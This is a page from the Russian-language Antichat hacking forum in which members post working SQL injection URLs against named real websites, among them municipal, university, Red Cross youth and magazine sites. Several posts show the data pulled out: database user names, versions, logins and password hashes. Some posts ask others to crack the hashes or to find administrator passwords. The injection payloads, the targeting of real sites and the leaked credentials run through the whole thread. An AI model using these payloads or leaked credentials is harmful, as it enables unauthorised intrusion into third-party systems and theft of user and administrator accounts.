ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4341  
Старый 06.01.2008, 02:44
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.arnaques.be/

Код:
http://www.arnaques.be/page.php?ID=-1+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*&crioc=O
root:696efd2f4c232e84

http://www.vrijwilligerswerk.be/

Код:
http://www.vrijwilligerswerk.be/nieuws/nieuws.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,password)+from+user/*
http://www.jeugdrodekruis.be/

Код:
http://www.jeugdrodekruis.be/index.php?ID=-1+union+select+1,concat_ws(char(58),user(),version(),database()),3/*
 
Ответить с цитированием

  #4342  
Старый 06.01.2008, 03:28
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

.AU
MsSQL
Google PR 5
Цитата:
http://www.unisport.com.au/extra.asp?id=1+or+1=(SELECT+db_name())--
Google PR 4
Цитата:
http://www.moyes.com.au/productdetail.asp?ID=1+or+1=(SELECT+db_name()))--
 
Ответить с цитированием

  #4343  
Старый 06.01.2008, 03:39
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

www.rollingstonemagazine.it
Код:
http://www.rollingstonemagazine.it/page.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11/*
5.0.32-Debian_7etch3-log:rs_magazine@localhost:db_rs_magazine

www.cinemadelsilenzio.it
Код:
http://www.cinemadelsilenzio.it/index.php?mod=film&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
5.0.22:WA_011920@localhost:cinemadelsilenzioit418

www.rock.cs.unitn.it
Код:
http://rock.cs.unitn.it/dett_abstract.php?id=000-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3/*
4.1.11:macrina@localhost:rock
 
Ответить с цитированием

www.punk.org.ua
  #4344  
Старый 06.01.2008, 03:40
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию www.punk.org.ua

www.punk.org.ua
4.1.12
Цитата:
http://www.punk.org.ua/users/detail.php?id=-8312+union+select+1,convert(concat_ws(0x3a,login,p assword,icq),binary),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3+from+users/*
root:2be43f140bb11412
referator:42587299301a11ad
yack:077c36bc25937347:wattie
punk:542fb5ca46bfbca2
Цитата:
http://www.punk.org.ua/users/detail.php?id=-8312+union+select+1,convert(concat_ws(0x3a,login,p assword,icq),binary),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3+from+users/*
 
Ответить с цитированием

  #4345  
Старый 06.01.2008, 04:14
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.eric-maerschalck.be/

Код:
http://www.eric-maerschalck.be/Bruxelles/themes_group.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/*
http://www.biteback.be/

Код:
http://www.biteback.be/goveg/ov_detail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3/*
 
Ответить с цитированием

  #4346  
Старый 06.01.2008, 04:20
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

http://techgaz.ru/
Цитата:
http://techgaz.ru/product.php?id=-1+union+select+concat_ws(0x3a,login,password,versi on()),2,3,4+from+utg_admin/*
techgaz : *2B5D01B5C8ECF867C58B966856AD111E4589B102 : 4.1.18-log

http://www.fotoinfo.net/
Цитата:
http://www.fotoinfo.net/speciale/detail.php?ID=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23/*
Наугад таблицы подгонял ,чёт не получилось, если у кого получится отпишите ради интереса

Последний раз редактировалось ILYAtirtir; 06.01.2008 в 04:25..
 
Ответить с цитированием

  #4347  
Старый 06.01.2008, 07:40
netpingx
Новичок
Регистрация: 13.12.2007
Сообщений: 2
Провел на форуме:
2667

Репутация: 10
По умолчанию

http://www.mysql-hispano.org/page.php?id=3+UNION+SELECT+1,2,3,4,5+from+hispano. users/*
 
Ответить с цитированием

  #4348  
Старый 06.01.2008, 07:54
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.buggenhout.be/

Код:
http://www.buggenhout.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
http://www.brecht.be/

Код:
http://www.brecht.be/dienst.asp?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)+from+SEC_USER)--
 
Ответить с цитированием

http://www.dynamomania.com
  #4349  
Старый 06.01.2008, 15:47
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию http://www.dynamomania.com

http://www.dynamomania.com

http://www.dynamomania.com/news.php?p=message&id=-31370+union+select+1,2,3,concat_ws(char(58),name,p wd,email),5,6+from+users/*

Дальше через limit

Это пароли от форума!!!

Пароли для админки не подходят=(
Если кто-нибудь найдет пароли для админки- отпишитесь пожалуйста))

Последний раз редактировалось Tigger; 06.01.2008 в 15:57..
 
Ответить с цитированием

http://www.greenshift.com/
  #4350  
Старый 06.01.2008, 15:48
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию http://www.greenshift.com/

http://www.greenshift.com/

http://www.greenshift.com/news.php?id=-97+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12+from+mysql.user/*

root:*3AE51E09E8B6540D267826C97259B607120DB332

Помагите расшифровать))

Последний раз редактировалось Tigger; 06.01.2008 в 16:18..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ